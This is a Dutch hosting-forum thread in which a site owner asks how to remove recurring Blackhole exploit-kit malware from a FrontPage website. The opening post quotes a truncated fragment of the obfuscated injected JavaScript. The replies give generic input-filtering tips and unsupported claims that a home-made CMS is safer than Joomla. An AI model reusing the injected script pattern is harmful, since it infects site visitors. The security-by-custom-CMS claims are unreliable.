1. zeromechanic Member

    Malware op website

    Topic geplaatst op: 03-10-2013 om 22:48

    Geachte,
    Bij een bekende van mij (heeft ergens anders hosting) heeft inneens last van malware op de website.

    google blokkeert deze dus ook steeds.

    Na herhaaldelijk verwijderen van de codes, komt de code steeds weer terug en blokkeert google de site opnieuw.

    Blackhole Kit Exploit en Scrip/Exploit Kit

     

    Als iemand hier ervaring mee heeft om dit te verwijderen.

    En vooral HOE het er steeds op komt.

    FTP en alle andere wachtwoorden zijn inmiddels gewijzigd, PC is door verschillende scanners uitgeplozen.

    Ik heb het sterke vermoeden dat het systeem van de hoster is besmet, maar weet dit niet zeker.

    Daarom wil ik tijdelijk de site eens opzetten hier bij versio om te kijken wat er gaat gebeuren.

    Het zijn eigen bouwsels met frontpage.

     

    geinjecteerde code snippet :

    < / div>< !- -a9a007-->< script type ="text/javascript" language=" javascript" >ddzdyq=String;svh="spl"+"i"+"t";wldgt=window;hrs=

     

  2. zaza Member
    Reactie geplaatst op: 13-10-2014 om 13:57

    Zorg er voor dat alleen platte teksten in textboxen geladen kunnen worden.

    Vond u dit antwoord nuttig?

  3. jordivn Member
    Reactie geplaatst op: 13-10-2014 om 20:44

    Ik heb zon zelfde aktie gezien bij Joomla.
    Deze kant en klare CMS zijn veel gebruikt en dus ook interessant voor hackers/scripters.
    Deze zijn bekent met de lekken en gebruiken deze ook.
    Ik zelf maak om die reden ook geen gebruik van deze systemen.
    Ze blijven kwetsbaar.

    Beter is een eigen gebouwde cms en site.

    Vond u dit antwoord nuttig?

  4. Mail Gmail Member
    Reactie geplaatst op: 17-10-2014 om 03:05

    Je hebt groot gelijk Jordi

    Vond u dit antwoord nuttig?

  5. zeromechanic Member
    Reactie geplaatst op: 17-10-2014 om 16:23

    Beetje oude topic.

    probleem is opgelost na verhuizen site naar eigen vps

    de oorzaak nooit meer kunnen achterhalen.
    blijf er bij dat het systeem van hun oude hoster was besmet

    Is een eigen bouwsel met frontpage.
    ben daar zelf ook niet zo kapot van, maar ja....

    Ik heb mijn eigen cms gemaakt. Niks opensource
    Is erg mooi opensource, maar veels te gevoelig voor dat soort dingen.
    Ook vaak zoveel rommel aanwezig in bv joomla wara je geen zak aan hebt en nooit gebruikt.

    De meeste klanten van mij willen gewoon basis.
    -pagina's, contactform, contact pagina, gastenboek.
    de eenvoudige dingen.

    Vond u dit antwoord nuttig?

  6. Mail Gmail Member
    Reactie geplaatst op: 18-10-2014 om 16:16

    Zo is dat ik ben ook voor zelf gemaakte CMS. Zoals je al zei Joomla is een voorbeeld met veel troep wat je nooit zult gebruiken.

    Vond u dit antwoord nuttig?

  7. Joey De Vries Member
    Reactie geplaatst op: 19-10-2014 om 10:42

    Zorg ervoor dat elke input die maar iets doet op de website wordt gefilted op: HTML Tags,JS Tags,XSS,MySQL Injections! Het verwijderen van kan ik niet verder helpen

    Vond u dit antwoord nuttig?